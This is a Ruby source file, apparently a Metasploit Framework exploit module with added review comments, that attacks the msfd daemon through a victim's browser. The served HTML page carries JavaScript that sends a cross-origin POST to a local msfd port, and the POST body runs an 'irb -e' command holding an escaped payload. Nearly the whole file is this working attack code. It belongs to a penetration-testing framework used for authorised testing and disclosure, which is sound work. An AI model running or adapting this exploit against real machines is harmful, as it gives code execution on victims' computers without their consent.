GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/msfd_rce_browser.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-side module: it serves an HTML page whose inline JavaScript makes
# the victim's browser POST a single msfconsole command line to an msfd
# listener. Nothing here talks to msfd directly; the only network path is
# the cross-origin POST issued from the victim's browser to REMOTE_IP:REMOTE_PORT
# (default 127.0.0.1), i.e. the exposure on the defender's side is an msfd
# listener that accepts commands from whatever reaches its port.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata, payload constraints and the two options that
  # locate msfd *as seen from the victim's browser* (not from the attacker).
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Metasploit msfd Remote Code Execution via Browser',
      # NOTE(review): the description below names the command as
      # 'rbi -e "CODE"', but on_request_uri sends 'irb -e "..."'; the
      # description looks like a typo for 'irb'.
      'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. This module connects to the msfd-socket
through the victim's browser.

To execute msfconsole-commands in JavaScript from a web application,
this module places the payload in the POST-data. These POST-requests
can be sent cross-domain and can therefore be sent to localhost on the
victim's machine. The msfconsole-command to execute code is 'rbi -e
"CODE"'.

Exploitation when the browser is running on Windows is unreliable and
the exploit is only usable when IE is used and the quiet-flag has been
passed to msf-daemon.
},
      'License' => BSD_LICENSE,
      'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
      'Platform' => 'ruby',
      'Arch' => ARCH_RUBY,
      'Targets' =>
        [
          [ 'Automatic', {}],
        ],
      'Payload' =>
        {
          'Space' => 8192, # Arbitrary limit
          # NOTE(review): a String, not the boolean true — confirm the
          # framework treats it as truthy.
          'DisableNops' => 'True',
          # The encoded payload is placed inside a JS double-quoted string and
          # the msfd command line is newline-terminated (see on_request_uri),
          # so '"' (0x22) and "\n" (0x0a) would cut the string/command short.
          'BadChars' => "\x22\x0a"
        },
      'DisclosureDate' => '2018-04-11', # Vendor notification
      'DefaultTarget' => 0))

    # Both values are interpolated verbatim into the served JavaScript; they
    # describe where msfd listens from the victim browser's point of view.
    register_options([
      OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
      OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
    ])
  end

  # No module-specific setup: defers entirely to the inherited implementation
  # (presumably the HttpServer mixin's, which dispatches requests to
  # on_request_uri — confirm against the mixin).
  def exploit
    super
  end

  # Builds and serves the HTML page for one browser request.
  #
  # @param cli the connected HTTP client; used for its peer address and to
  #   send the response
  # @param request the incoming HTTP request (not inspected here)
  def on_request_uri(cli, request)
    # Log prefix: padded peer address plus this module's short name.
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
    sc = payload.encoded
    # Re-encode every character of the payload as a JavaScript "\xNN" escape:
    # 'U' unpacks UTF-8 code points and to_s(16) renders each one as hex.
    # to_s(16) does not zero-pad, so a code point below 0x10 yields a single
    # hex digit and one above 0xff yields more than two digits.
    # NOTE(review): this assumes the encoded Ruby payload stays within
    # 0x10..0xff — confirm.
    shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
    # Random alphabetic identifiers (6..11 characters) for the two JS variables.
    var1 = rand_text_alpha(rand(6..11))
    var2 = rand_text_alpha(rand(6..11))
    # Cross-origin POST from the browser to the msfd port. In this heredoc
    # "\\"" is the Ruby spelling of the JS escape \" and "\\n" of \n, so the
    # request body msfd receives is:  irb -e "<payload>"  followed by a newline.
    html = <<-EOS
<html>
<head></head>
<body>
<script>
var #{var1} = new XMLHttpRequest();
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
var #{var2} = String("#{shellcode}");
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
</script>
</body>
</html>
EOS
    print_status("#{msg} Sending HTML...")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end